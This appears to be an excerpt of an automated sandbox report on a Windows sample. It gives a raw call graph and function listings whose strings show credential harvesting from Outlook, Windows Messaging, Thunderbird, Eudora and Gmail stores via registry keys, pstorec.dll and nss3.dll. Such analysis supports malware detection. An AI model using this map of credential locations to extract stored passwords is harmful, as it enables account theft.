calls 33721->33940 33730 410807 33729->33730 33731 4107fc FreeLibrary 33729->33731 33730->33509 33731->33730 33733 404785 FreeLibrary 33732->33733 33734 40473b LoadLibraryA 33733->33734 33735 40474c GetProcAddress 33734->33735 33738 40476e 33734->33738 33736 404764 33735->33736 33735->33738 33736->33738 33737 404781 33737->33509 33738->33737 33739 404785 FreeLibrary 33738->33739 33739->33737 33740->33511 33742 4037c5 33741->33742 33743 4036fb 33741->33743 33742->33666 33941 410863 UuidFromStringA UuidFromStringA memcpy 33743->33941 33745 40370e 33745->33742 33746 403716 strchr 33745->33746 33746->33742 33747 403730 33746->33747 33942 4021b6 memset 33747->33942 33749 40373f _mbscpy _mbscpy strlen 33750 4037a4 _mbscpy 33749->33750 33751 403789 sprintf 33749->33751 33943 4023e5 16 API calls 33750->33943 33751->33750 33754 4085e2 33753->33754 33944 4082cd 11 API calls 33754->33944 33758 408600 33759 403cba 33758->33759 33760 40860b memset 33758->33760 33771 40821d 33759->33771 33947 410b62 RegEnumKeyExA 33760->33947 33762 4086d2 RegCloseKey 33762->33759 33764 408637 33764->33762 33765 40865c memset 33764->33765 33948 410a9c RegOpenKeyExA 33764->33948 33951 410b62 RegEnumKeyExA 33764->33951 33949 410add RegQueryValueExA 33765->33949 33768 408694 33950 40848b 10 API calls 33768->33950 33770 4086ab RegCloseKey 33770->33764 33952 410a9c RegOpenKeyExA 33771->33952 33773 40823f 33774 403cc6 33773->33774 33775 408246 memset 33773->33775 33783 4086e0 33774->33783 33953 410b62 RegEnumKeyExA 33775->33953 33777 4082bf RegCloseKey 33777->33774 33779 40826f 33779->33777 33954 410a9c RegOpenKeyExA 33779->33954 33955 4080ed 11 API calls 33779->33955 33956 410b62 RegEnumKeyExA 33779->33956 33782 4082a2 RegCloseKey 33782->33779 33957 4045db 33783->33957 33785 4088ef 33965 404656 33785->33965 33789 408737 wcslen 33789->33785 33795 40876a 33789->33795 33790 40877a _wcsncoll 33790->33795 33792 404734 3 API calls 33792->33795 33793 404785 FreeLibrary 33793->33795 33794 408812 memset 33794->33795 33796 40883c memcpy wcschr 33794->33796 33795->33785 33795->33790 33795->33792 33795->33793 33795->33794 33795->33796 33797 4088c3 LocalFree 33795->33797 33968 40466b _mbscpy 33795->33968 33796->33795 33797->33795 33798 410a9c RegOpenKeyExA 33798->33679 33799->33683 33969 410a9c RegOpenKeyExA 33800->33969 33802 402c7a 33803 402da5 33802->33803 33804 402c87 memset 33802->33804 33803->33688 33970 410b62 RegEnumKeyExA 33804->33970 33806 402d9c RegCloseKey 33806->33803 33807 402cb2 33807->33806 33808 410b1e 3 API calls 33807->33808 33817 402d9a 33807->33817 33974 402bd1 39 API calls 33807->33974 33975 410b62 RegEnumKeyExA 33807->33975 33809 402ce4 memset sprintf 33808->33809 33971 410a9c RegOpenKeyExA 33809->33971 33811 402d28 33812 402d3a sprintf 33811->33812 33972 402bd1 39 API calls 33811->33972 33973 410a9c RegOpenKeyExA 33812->33973 33817->33806 33818->33691 33819->33695 33820->33699 33822 410816 33821->33822 33823 4107f1 FreeLibrary 33822->33823 33824 403ddd 33823->33824 33824->33704 33976 410a9c RegOpenKeyExA 33825->33976 33827 402ff9 33828 403006 memset 33827->33828 33829 40312c 33827->33829 33977 410b62 RegEnumKeyExA 33828->33977 33829->33708 33831 403122 RegCloseKey 33831->33829 33832 410b1e 3 API calls 33833 403058 memset sprintf 33832->33833 33978 410a9c RegOpenKeyExA 33833->33978 33835 4030a2 memset 33979 410b62 RegEnumKeyExA 33835->33979 33836 410b62 RegEnumKeyExA 33840 403033 33836->33840 33838 4030f9 RegCloseKey 33838->33840 33840->33831 33840->33832 33840->33835 33840->33836 33840->33838 33980 402db3 26 API calls 33840->33980 33842 4032d5 33841->33842 33843 4033a9 33841->33843 33981 4021b6 memset 33842->33981 33856 4034e4 memset memset 33843->33856 33845 4032e1 33982 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33845->33982 33847 4032ea 33848 4032f8 memset GetPrivateProfileSectionA 33847->33848 33983 4023e5 16 API calls 33847->33983 33848->33843 33853 40332f 33848->33853 33850 40339b strlen 33850->33843 33850->33853 33852 403350 strchr 33852->33853 33853->33843 33853->33850 33984 4021b6 memset 33853->33984 33985 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33853->33985 33986 4023e5 16 API calls 33853->33986 33857 410b1e 3 API calls 33856->33857 33858 40353f 33857->33858 33859 40357f 33858->33859 33860 403546 _mbscpy 33858->33860 33864 403985 33859->33864 33987 406d55 strlen _mbscat 33860->33987 33862 403565 _mbscat 33988 4033f0 19 API calls 33862->33988 33989 40466b _mbscpy 33864->33989 33868 4039aa 33870 4039ff 33868->33870 33990 40f460 memset memset 33868->33990 34011 40f6e2 33868->34011 34027 4038e8 21 API calls 33868->34027 33871 404785 FreeLibrary 33870->33871 33872 403a0b 33871->33872 33873 4037ca memset memset 33872->33873 34035 444551 memset 33873->34035 33875 4038e2 33875->33718 33939 40f334 334 API calls 33875->33939 33878 40382e 33879 406f06 2 API calls 33878->33879 33880 403843 33879->33880 33881 406f06 2 API calls 33880->33881 33882 403855 strchr 33881->33882 33883 403884 _mbscpy 33882->33883 33884 403897 strlen 33882->33884 33885 4038bf _mbscpy 33883->33885 33884->33885 33886 4038a4 sprintf 33884->33886 34047 4023e5 16 API calls 33885->34047 33886->33885 33889 44b090 33888->33889 33890 40fb10 RegOpenKeyExA 33889->33890 33891 403e7f 33890->33891 33892 40fb3b RegOpenKeyExA 33890->33892 33902 40f96c 33891->33902 33893 40fb55 RegQueryValueExA 33892->33893 33894 40fc2d RegCloseKey 33892->33894 33895 40fc23 RegCloseKey 33893->33895 33896 40fb84 33893->33896 33894->33891 33895->33894 33897 404734 3 API calls 33896->33897 33898 40fb91 33897->33898 33898->33895 33899 40fc19 LocalFree 33898->33899 33900 40fbdd memcpy memcpy 33898->33900 33899->33895 34052 40f802 11 API calls 33900->34052 33903 4070ae GetVersionExA 33902->33903 33904 40f98d 33903->33904 33905 4045db 7 API calls 33904->33905 33913 40f9a9 33905->33913 33906 40fae6 33907 404656 FreeLibrary 33906->33907 33908 403e85 33907->33908 33914 4442ea memset 33908->33914 33909 40fa13 memset WideCharToMultiByte 33910 40fa43 _strnicmp 33909->33910 33909->33913 33911 40fa5b WideCharToMultiByte 33910->33911 33910->33913 33912 40fa88 WideCharToMultiByte 33911->33912 33911->33913 33912->33913 33913->33906 33913->33909 33915 410dbb 9 API calls 33914->33915 33916 444329 33915->33916 34053 40759e strlen strlen 33916->34053 33921 410dbb 9 API calls 33922 444350 33921->33922 33923 40759e 3 API calls 33922->33923 33924 44435a 33923->33924 33925 444212 65 API calls 33924->33925 33926 444366 memset memset 33925->33926 33927 410b1e 3 API calls 33926->33927 33928 4443b9 ExpandEnvironmentStringsA strlen 33927->33928 33929 4443f4 _strcmpi 33928->33929 33930 4443e5 33928->33930 33931 403e91 33929->33931 33932 44440c 33929->33932 33930->33929 33931->33509 33933 444212 65 API calls 33932->33933 33933->33931 33934->33680 33935->33684 33936->33692 33937->33696 33938->33700 33939->33718 33940->33720 33941->33745 33942->33749 33943->33742 33945 40841c 33944->33945 33946 410a9c RegOpenKeyExA 33945->33946 33946->33758 33947->33764 33948->33764 33949->33768 33950->33770 33951->33764 33952->33773 33953->33779 33954->33779 33955->33782 33956->33779 33958 404656 FreeLibrary 33957->33958 33959 4045e3 LoadLibraryA 33958->33959 33960 404651 33959->33960 33961 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33959->33961 33960->33785 33960->33789 33962 40463d 33961->33962 33963 404643 33962->33963 33964 404656 FreeLibrary 33962->33964 33963->33960 33964->33960 33966 403cd2 33965->33966 33967 40465c FreeLibrary 33965->33967 33966->33798 33967->33966 33968->33795 33969->33802 33970->33807 33971->33811 33972->33812 33973->33807 33974->33807 33975->33807 33976->33827 33977->33840 33978->33840 33979->33840 33980->33840 33981->33845 33982->33847 33983->33848 33984->33852 33985->33853 33986->33853 33987->33862 33988->33859 33989->33868 34028 4078ba 33990->34028 33993 4078ba _mbsnbcat 33994 40f5a3 RegOpenKeyExA 33993->33994 33995 40f5c3 RegQueryValueExA 33994->33995 33996 40f6d9 33994->33996 33997 40f6d0 RegCloseKey 33995->33997 33998 40f5f0 33995->33998 33996->33868 33997->33996 33998->33997 33999 40f675 33998->33999 34032 40466b _mbscpy 33998->34032 33999->33997 34033 4012ee strlen 33999->34033 34001 40f611 34003 404734 3 API calls 34001->34003 34008 40f616 34003->34008 34004 40f69e RegQueryValueExA 34004->33997 34005 40f6c1 34004->34005 34005->33997 34006 40f66a 34007 404785 FreeLibrary 34006->34007 34007->33999 34008->34006 34009 40f661 LocalFree 34008->34009 34010 40f645 memcpy 34008->34010 34009->34006 34010->34009 34034 40466b _mbscpy 34011->34034 34013 40f6fa 34014 4045db 7 API calls 34013->34014 34015 40f708 34014->34015 34016 404734 3 API calls 34015->34016 34021 40f7e2 34015->34021 34022 40f715 34016->34022 34017 404656 FreeLibrary 34018 40f7f1 34017->34018 34019 404785 FreeLibrary 34018->34019 34020 40f7fc 34019->34020 34020->33868 34021->34017 34022->34021 34023 40f797 WideCharToMultiByte 34022->34023 34024 40f7b8 strlen 34023->34024 34025 40f7d9 LocalFree 34023->34025 34024->34025 34026 40f7c8 _mbscpy 34024->34026 34025->34021 34026->34025 34027->33868 34029 4078e6 34028->34029 34030 4078c7 _mbsnbcat 34029->34030 34031 4078ea 34029->34031 34030->34029 34031->33993 34032->34001 34033->34004 34034->34013 34048 410a9c RegOpenKeyExA 34035->34048 34037 40381a 34037->33875 34046 4021b6 memset 34037->34046 34038 44458b 34038->34037 34049 410add RegQueryValueExA 34038->34049 34040 4445a4 34041 4445dc RegCloseKey 34040->34041 34050 410add RegQueryValueExA 34040->34050 34041->34037 34043 4445c1 34043->34041 34051 444879 30 API calls 34043->34051 34045 4445da 34045->34041 34046->33878 34047->33875 34048->34038 34049->34040 34050->34043 34051->34045 34052->33899 34054 4075c9 34053->34054 34055 4075bb _mbscat 34053->34055 34056 444212 34054->34056 34055->34054 34073 407e9d 34056->34073 34059 44424d 34060 444274 34059->34060 34061 444258 34059->34061 34081 407ef8 34059->34081 34062 407e9d 9 API calls 34060->34062 34098 444196 52 API calls 34061->34098 34069 4442a0 34062->34069 34064 407ef8 9 API calls 34064->34069 34065 4442ce 34095 407f90 34065->34095 34069->34064 34069->34065 34071 444212 65 API calls 34069->34071 34091 407e62 34069->34091 34070 407f90 FindClose 34072 4442e4 34070->34072 34071->34069 34072->33921 34074 407f90 FindClose 34073->34074 34075 407eaa 34074->34075 34076 406f06 2 API calls 34075->34076 34077 407ebd strlen strlen 34076->34077 34078 407ee1 34077->34078 34079 407eea 34077->34079 34099 4070e3 strlen _mbscat _mbscpy _mbscat 34078->34099 34079->34059 34082 407f03 FindFirstFileA 34081->34082 34083 407f24 FindNextFileA 34081->34083 34084 407f3f 34082->34084 34085 407f46 strlen strlen 34083->34085 34086 407f3a 34083->34086 34084->34085 34088 407f7f 34084->34088 34085->34088 34089 407f76 34085->34089 34087 407f90 FindClose 34086->34087 34087->34084 34088->34059 34100 4070e3 strlen _mbscat _mbscpy _mbscat 34089->34100 34092 407e6c strcmp 34091->34092 34094 407e94 34091->34094 34093 407e83 strcmp 34092->34093 34092->34094 34093->34094 34094->34069 34096 407fa3 34095->34096 34097 407f99 FindClose 34095->34097 34096->34070 34097->34096 34098->34059 34099->34079 34100->34088 34101->33523 34102->33527 34103->33533 34104->33535 34105->33540 34106->33537 34107->33532 34116 411853 RtlInitializeCriticalSection memset 34117 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34290 40a256 13 API calls 34292 432e5b 17 API calls 34294 43fa5a 20 API calls 34119 401060 41 API calls 34297 427260 CloseHandle memset memset 33197 410c68 FindResourceA 33198 410c81 SizeofResource 33197->33198 33200 410cae 33197->33200 33199 410c92 LoadResource 33198->33199 33198->33200 33199->33200 33201 410ca0 LockResource 33199->33201 33201->33200 34299 405e69 14 API calls 34124 433068 15 API calls __fprintf_l 34301 414a6d 18 API calls 34302 43fe6f 134 API calls 34126 424c6d 15 API calls __fprintf_l 34303 426741 19 API calls 34128 440c70 17 API calls 34129 443c71 44 API calls 34132 427c79 24 API calls 34306 416e7e memset __fprintf_l 34136 42800b 47 API calls 34137 425115 85 API calls __fprintf_l 34309 41960c 61 API calls 34138 43f40c 122 API calls __fprintf_l 34141 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34142 43f81a 20 API calls 34144 414c20 memset memset 34145 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34313 414625 18 API calls 34314 404225 modf 34315 403a26 strlen WriteFile 34317 40422a 12 API calls 34321 427632 memset memset memcpy 34322 40ca30 59 API calls 34323 404235 26 API calls 34146 42ec34 61 API calls __fprintf_l 34147 425115 76 API calls __fprintf_l 34324 425115 77 API calls __fprintf_l 34326 44223a 38 API calls 34153 43183c 112 API calls 34327 44b2c5 _onexit __dllonexit 34332 42a6d2 memcpy __allrem 34155 405cda 65 API calls 34340 43fedc 138 API calls 34341 4116e1 16 API calls __fprintf_l 34158 4244e6 19 API calls 34160 42e8e8 127 API calls __fprintf_l 34161 4118ee RtlLeaveCriticalSection 34346 43f6ec 22 API calls 34163 425115 119 API calls __fprintf_l 33187 410cf3 EnumResourceNamesA 34349 4492f0 memcpy memcpy 34351 43fafa 18 API calls 34353 4342f9 15 API calls __fprintf_l 34164 4144fd 19 API calls 34355 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34356 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34359 443a84 _mbscpy 34361 43f681 17 API calls 34167 404487 22 API calls 34363 415e8c 16 API calls __fprintf_l 34171 411893 RtlDeleteCriticalSection __fprintf_l 34172 41a492 42 API calls 34367 403e96 34 API calls 34368 410e98 memset SHGetPathFromIDList SendMessageA 34174 426741 109 API calls __fprintf_l 34175 4344a2 18 API calls 34176 4094a2 10 API calls 34371 4116a6 15 API calls __fprintf_l 34372 43f6a4 17 API calls 34373 440aa3 20 API calls 34375 427430 45 API calls 34179 4090b0 7 API calls 34180 4148b0 15 API calls 34182 4118b4 RtlEnterCriticalSection 34183 4014b7 CreateWindowExA 34184 40c8b8 19 API calls 34186 4118bf RtlTryEnterCriticalSection 34380 42434a 18 API calls __fprintf_l 34382 405f53 12 API calls 34194 43f956 59 API calls 34196 40955a 17 API calls 34197 428561 36 API calls 34198 409164 7 API calls 34386 404366 19 API calls 34390 40176c ExitProcess 34393 410777 42 API calls 34203 40dd7b 51 API calls 34204 425d7c 16 API calls __fprintf_l 34395 43f6f0 25 API calls 34396 42db01 22 API calls 34205 412905 15 API calls __fprintf_l 34397 403b04 54 API calls 34398 405f04 SetDlgItemTextA GetDlgItemTextA 34399 44b301 ??3@YAXPAX 34402 4120ea 14 API calls 3 library calls 34403 40bb0a 8 API calls 34405 413f11 strcmp 34209 434110 17 API calls __fprintf_l 34212 425115 108 API calls __fprintf_l 34406 444b11 _onexit 34214 425115 76 API calls __fprintf_l 34217 429d19 10 API calls 34409 444b1f __dllonexit 34410 409f20 _strcmpi 34219 42b927 31 API calls 34413 433f26 19 API calls __fprintf_l 34414 44b323 FreeLibrary 34415 427f25 46 API calls 34416 43ff2b 17 API calls 34417 43fb30 19 API calls 34226 414d36 16 API calls 34228 40ad38 7 API calls 34419 433b38 16 API calls __fprintf_l 34420 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34232 426741 21 API calls 34233 40c5c3 125 API calls 34235 43fdc5 17 API calls 34421 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34238 4161cb memcpy memcpy memcpy memcpy 33202 44b3cf 33203 44b3e6 33202->33203 33205 44b454 33202->33205 33203->33205 33209 44b40e 33203->33209 33206 44b405 33206->33205 33207 44b435 VirtualProtect 33206->33207 33207->33205 33208 44b444 VirtualProtect 33207->33208 33208->33205 33210 44b413 33209->33210 33212 44b454 33210->33212 33216 44b42b 33210->33216 33213 44b41c 33213->33212 33214 44b435 VirtualProtect 33213->33214 33214->33212 33215 44b444 VirtualProtect 33214->33215 33215->33212 33217 44b431 33216->33217 33218 44b435 VirtualProtect 33217->33218 33220 44b454 33217->33220 33219 44b444 VirtualProtect 33218->33219 33218->33220 33219->33220 34426 43ffc8 18 API calls 34239 4281cc 15 API calls __fprintf_l 34428 4383cc 110 API calls __fprintf_l 34240 4275d3 41 API calls 34429 4153d3 22 API calls __fprintf_l 34241 444dd7 _XcptFilter 34434 4013de 15 API calls 34436 425115 111 API calls __fprintf_l 34437 43f7db 18 API calls 34440 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34243 4335ee 16 API calls __fprintf_l 34442 429fef 11 API calls 34244 444deb _exit _c_exit 34443 40bbf0 138 API calls 34247 425115 79 API calls __fprintf_l 34447 437ffa 22 API calls 34251 4021ff 14 API calls 34252 43f5fc 149 API calls 34448 40e381 9 API calls 34254 405983 40 API calls 34255 42b186 27 API calls __fprintf_l 34256 427d86 76 API calls 34257 403585 20 API calls 34259 42e58e 18 API calls __fprintf_l 34262 425115 75 API calls __fprintf_l 34264 401592 8 API calls 33188 410b92 33191 410a6b 33188->33191 33190 410bb2 33192 410a77 33191->33192 33193 410a89 GetPrivateProfileIntA 33191->33193 33196 410983 memset _itoa WritePrivateProfileStringA 33192->33196 33193->33190 33195 410a84 33195->33190 33196->33195 34452 434395 16 API calls 34266 441d9c memcmp 34454 43f79b 119 API calls 34267 40c599 43 API calls 34455 426741 87 API calls 34271 4401a6 21 API calls 34273 426da6 memcpy memset memset memcpy 34274 4335a5 15 API calls 34276 4299ab memset memset memcpy memset memset 34277 40b1ab 8 API calls 34460 425115 76 API calls __fprintf_l 34464 4113b2 18 API calls 2 library calls 34468 40a3b8 memset sprintf SendMessageA 33221 410bbc 33224 4109cf 33221->33224 33225 4109dc 33224->33225 33226 410a23 memset GetPrivateProfileStringA 33225->33226 33227 4109ea memset 33225->33227 33232 407646 strlen 33226->33232 33237 4075cd sprintf memcpy 33227->33237 33230 410a0c WritePrivateProfileStringA 33231 410a65 33230->33231 33233 40765a 33232->33233 33235 40765c 33232->33235 33233->33231 33234 4076a3 33234->33231 33235->33234 33238 40737c strtoul 33235->33238 33237->33230 33238->33235 34279 40b5bf memset memset _mbsicmp

                                          Executed Functions

                                          Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                          APIs
                                          • memset.MSVCRT ref: 0040832F
                                          • memset.MSVCRT ref: 00408343
                                          • memset.MSVCRT ref: 0040835F
                                          • memset.MSVCRT ref: 00408376
                                          • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                          • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                          • strlen.MSVCRT ref: 004083E9
                                          • strlen.MSVCRT ref: 004083F8
                                          • memcpy.MSVCRT ref: 0040840A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$ByteCharMulusermeWidestrlen$ComputerUsermemcpy
                                          • String ID: 5$H$O$b$i$}$}
                                          • API String ID: 1832431107-3760989150
                                          • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                          • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                          • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                          • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                          Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 443 407ef8-407f01 444 407f03-407f22 FindFirstFileA 443->444 445 407f24-407f38 FindNextFileA 443->445 446 407f3f-407f44 444->446 447 407f46-407f74 strlen * 2 445->447 448 407f3a call 407f90 445->448 446->447 450 407f89-407f8f 446->450 451 407f83 447->451 452 407f76-407f81 call 4070e3 447->452 448->446 454 407f86-407f88 451->454 452->454 454->450
                                          APIs
                                          • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                          • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                          • strlen.MSVCRT ref: 00407F5C
                                          • strlen.MSVCRT ref: 00407F64
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FileFindstrlen$FirstNext
                                          • String ID: ACD
                                          • API String ID: 379999529-620537770
                                          • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                          • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                          • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                          • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                          Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • memset.MSVCRT ref: 00401E8B
                                          • strlen.MSVCRT ref: 00401EA4
                                          • strlen.MSVCRT ref: 00401EB2
                                          • strlen.MSVCRT ref: 00401EF8
                                          • strlen.MSVCRT ref: 00401F06
                                          • memset.MSVCRT ref: 00401FB1
                                          • atoi.MSVCRT ref: 00401FE0
                                          • memset.MSVCRT ref: 00402003
                                          • sprintf.MSVCRT ref: 00402030
                                            • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                          • memset.MSVCRT ref: 00402086
                                          • memset.MSVCRT ref: 0040209B
                                          • strlen.MSVCRT ref: 004020A1
                                          • strlen.MSVCRT ref: 004020AF
                                          • strlen.MSVCRT ref: 004020E2
                                          • strlen.MSVCRT ref: 004020F0
                                          • memset.MSVCRT ref: 00402018
                                            • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                          • _mbscpy.MSVCRT ref: 00402177
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                          • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                            • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                          • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                          • API String ID: 1846531875-4223776976
                                          • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                          • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                          • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                          • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                          Function 0040CF44 Relevance: 42.2, APIs: 18, Strings: 6, Instructions: 169COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                            • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                            • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                            • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                          • DeleteObject.GDI32(?), ref: 0040D1A6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                          • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$`7<u
                                          • API String ID: 745651260-3672999695
                                          • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                          • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                          • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                          • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                          Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                          • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                          • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                          • _mbscpy.MSVCRT ref: 00403E54
                                          Strings
                                          • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                          • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                          • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                          • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                          • PStoreCreateInstance, xrefs: 00403C44
                                          • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                          • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                          • pstorec.dll, xrefs: 00403C30
                                          • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                          • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                          • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                          • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Library$AddressFreeLoadProc_mbscpy
                                          • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                          • API String ID: 1197458902-317895162
                                          • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                          • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                          • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                          • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                          Function 00444C4A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 128COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
